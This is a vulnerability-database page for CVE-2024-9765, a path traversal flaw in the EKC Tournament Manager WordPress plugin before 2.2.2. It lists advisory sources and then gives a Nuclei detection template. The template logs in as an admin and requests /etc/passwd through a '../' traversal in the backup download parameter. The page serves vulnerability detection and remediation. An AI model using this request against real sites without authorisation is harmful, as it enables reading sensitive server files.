| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2024-9765 | 16 May 202520:34 | – | circl | |
| WordPress plugin EKC Tournament Manager 安全漏洞 | 15 May 202500:00 | – | cnnvd | |
| CVE-2024-9765 | 15 May 202520:07 | – | cve | |
| CVE-2024-9765 EKC Tournament Manager < 2.2.2 - Local File Download Vulnerability | 15 May 202520:07 | – | cvelist | |
| EUVD-2025-15201 | 3 Oct 202520:07 | – | euvd | |
| CVE-2024-9765 | 15 May 202520:16 | – | nvd | |
| WordPress EKC Tournament Manager plugin < 2.2.2 - Admin+ Arbitrary File Download vulnerability | 19 May 202503:59 | – | patchstack | |
| PT-2025-21550 | 15 May 202500:00 | – | ptsecurity | |
| CVE-2024-9765 | 17 May 202521:03 | – | redhatcve | |
| CVE-2024-9765 EKC Tournament Manager < 2.2.2 - Local File Download Vulnerability | 15 May 202520:07 | – | vulnrichment |
id: CVE-2024-9765
info:
name: EKC Tournament Manager WordPress plugin - Path Traversal
author: Sourabh-Sahu
severity: medium
description: |
EKC Tournament Manager WordPress plugin < 2.2.2 contains a path traversal caused by insufficient validation, letting logged in admin users download system files outside the WordPress directory.
impact: |
Logged in admin users can download arbitrary system files, potentially exposing sensitive information.
remediation: |
Upgrade to version 2.2.2 or later.
reference:
- https://wpscan.com/vulnerability/c86157b0-43f3-4e82-9697-7dd9401b48d6/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2024-9765
cwe-id: NVD-CWE-noinfo
epss-score: 0.01414
epss-percentile: 0.69472
cpe: cpe:2.3:a:lukashuser:ekc_tournament_manager:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: lukashuser
product: ekc_tournament_manager
tags: cve,cve2024,lukashuser,ekc-tournament-manager,authenticated,lfi,vuln
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=
matchers:
- type: dsl
dsl:
- contains(header, "wordpress_logged_in")
internal: true
- raw:
- |
GET /wp-admin/admin.php?page=ekc-backup&action=download&backup=../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- regex('root:.*:0:0:', body)
condition: and
# digest: 4a0a00473045022100e6834ac66c093ed7f65a160720823b2dd64dad0a77c5ac397b85ff13ecf70e5f0220665657bdddd1d4711f0ffbd58095b72b84771edd5125bf3ea9d880f1217126bf:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation